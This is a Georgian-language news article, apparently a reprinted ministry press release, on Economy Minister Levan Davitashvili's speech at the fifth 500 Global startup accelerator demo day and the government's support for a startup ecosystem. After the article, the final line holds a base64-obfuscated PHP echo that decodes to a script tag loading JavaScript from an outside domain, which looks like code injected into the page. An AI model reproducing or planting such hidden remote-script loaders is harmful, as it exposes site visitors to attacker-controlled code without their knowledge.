celsiusi
ავერსი შნაიდერი

ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა „500 სტარტაპის დემო დღის“ ღონისძიებაში მიიღო მონაწილეობა.

ლევან დავითაშვილმა დამსწრე საზოგადოებას, აქსელერაციის პროგრამის ორგანიზატორებს, მონაწილეებსა და ბიზნესსექტორს სიტყვით მიმართა, სადაც ისაუბრა როგორც ამ პროგრამის მნიშვნელობაზე, ისე ზოგადად ქვეყანაში ინოვაციებისა და ტექნოლოგიების, სტარტაპ ეკოსისტემის ზრდისა და განვითარების აუცილებლობასა და ამ კუთხით სახელმწიფოს როლზე.

500 Global-მა, საქართველოს ბანკთან და საქართველოს ინოვაციების და ტექნოლოგიების სააგენტოსთან ერთად აქსელერაციის პროგრამის მეხუთე ნაკადის შემაჯამებელ ღონისძიებას, დემო დღეს უმასპინძლა. პროგრამის ფარგლებში 5 ქვეყნის 10 სტარტაპს შესაძლებლობა ჰქონდა, საკუთარი კომპანიები ფართო აუდიტორიისთვის გაეცნოთ, მათ შორის ადგილობრივი და საერთაშორისო სტეიკჰოლდერებისთვის, ვენჩურული კაპიტალის მქონე საზოგადოების, ბიზნეს და მედია წარმომადგენლებისთვის. დემო დღე კი მათ შესაძლებლობას აძლევს, შეხვდნენ პოტენციურ ინვესტორებს, წარადგინონ თავიანთი პროდუქტები და დაამყარონ საქმიანი კავშირები.

„500 სტარტაპთან“ ერთად უკვე მეხუთედ ვაკეთებთ აქსელერაციის პროგრამის დემო დღეს – როცა სტარტაპერებს საშუალება ეძლევათ, თავისი პროდუქტების და მიგნებების, კომპანიის შესახებ გააკეთონ პრეზენტაცია. მათ ასევე საშუალება აქვთ, ესაუბრონ უშუალოდ ინვესტორებს და, რა თქმა უნდა, იზრუნონ ფინანსების მოზიდვაზე იმისთვის, რომ ახალი კომპანიები, ინოვაციები წარმატებული იყოს და გლობალურ ასპარეზზე გავიდნენ“, – აღნიშნა ეკონომიკის მინისტრმა.

500 Global გლობალური ვენჩურული საინვესტიციო კომპანიაა, რომელიც 2.4 მილიარდიან აქტივებს მართავს. ის ინვესტიციას ახორციელებს სტარტაპებში, რომლებიც ქმნიან სწრაფად მზარდ ტექნოლოგიურ კომპანიებს. ამასთან, 500 Global აქტიურად თანამშრომლობს ეკოსისტემის მთავარ მონაწილეებთან და კონსულტაციას უწევს მთავრობებს ისეთი სამეწარმეო ეკოსისტემის შექმნის კუთხით, სადაც სტარტაპებს სწრაფი განვითარების შესაძლებლობა ექნებათ.

საქართველოში ჩატარებული 5 ნაკადის ფარგლებში, 60-ზე მეტ სტარტაპს ჰქონდა ინტენსიური აქსელერაციის პროგრამაში მონაწილეობის საშუალება, მათ შორის ადგილობრივი სტრატაპ-კომპანიების გარდა იყვნენ სტარტაპები უკრაინიდან, აზერბაიჯანიდან, სომხეთიდან, უზბეკეთიდან, ყაზახეთიდან, ლიეტუვადან და სხვა.

როგორც ეკონომიკის მინისტრმა აღნიშნა, საქართველოს მთავრობა სტარტაპ-სისტემის გასავითარებლად წლების განმავლობაში თანმიმდევრულად მუშაობს.

„ჩვენ პირველ რიგში აქსელერაციის რეგიონულ პროგრამაში ჩავერთეთ, რაც საშუალებას აძლევს ქართველ მეწარმეებს, რომ გაზარდონ თავიანთი კომპეტენცია და კვალიფიკაცია, უცხოელ ინვესტორებს თავიანთი პროდუქტების შესახებ ესაუბრონ. თუმცა, ამის გარდა, მიმდინარე წელი იყო განსაკუთრებით მნიშვნელოვანი – ჩვენ კერძო ინვესტორებთან ერთად უკვე ვენჩურული ფონდი დავაფუძნეთ, სადაც ასევე პროფესიონალი მმართველი კომპანია გვყავს იმისთვის, რომ სტარტაპ კომპანიებმა არამხოლოდ უცხოეთში სცადონ დაფინანსების მოზიდვა, არამედ ეს საქართველოშიც შეძლონ და, რა თქმა უნდა, რომ მათი წამოწყებები უფრო წარმატებული იყოს“, – განაცხადა ლევან დავითაშვილმა.

ამასთან, როგორც ვიცე-პრემიერმა ხაზგასმით აღნიშნა, სახელმწიფო მომავალშიც გააგრძელებს ტექნოლოგიების და ინოვაციების მხარდაჭერას, რადგან ეს ძალიან მნიშვნელოვანი მიმართულებაა ჩვენი ქვეყნის ეკონომიკის ტრანსფორმაციისთვის.

ინფორმაციას ეკონომიკისა და მდგრადი განავითარების სამინისტროს პრესსამსახური ავრცელებს.

204
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");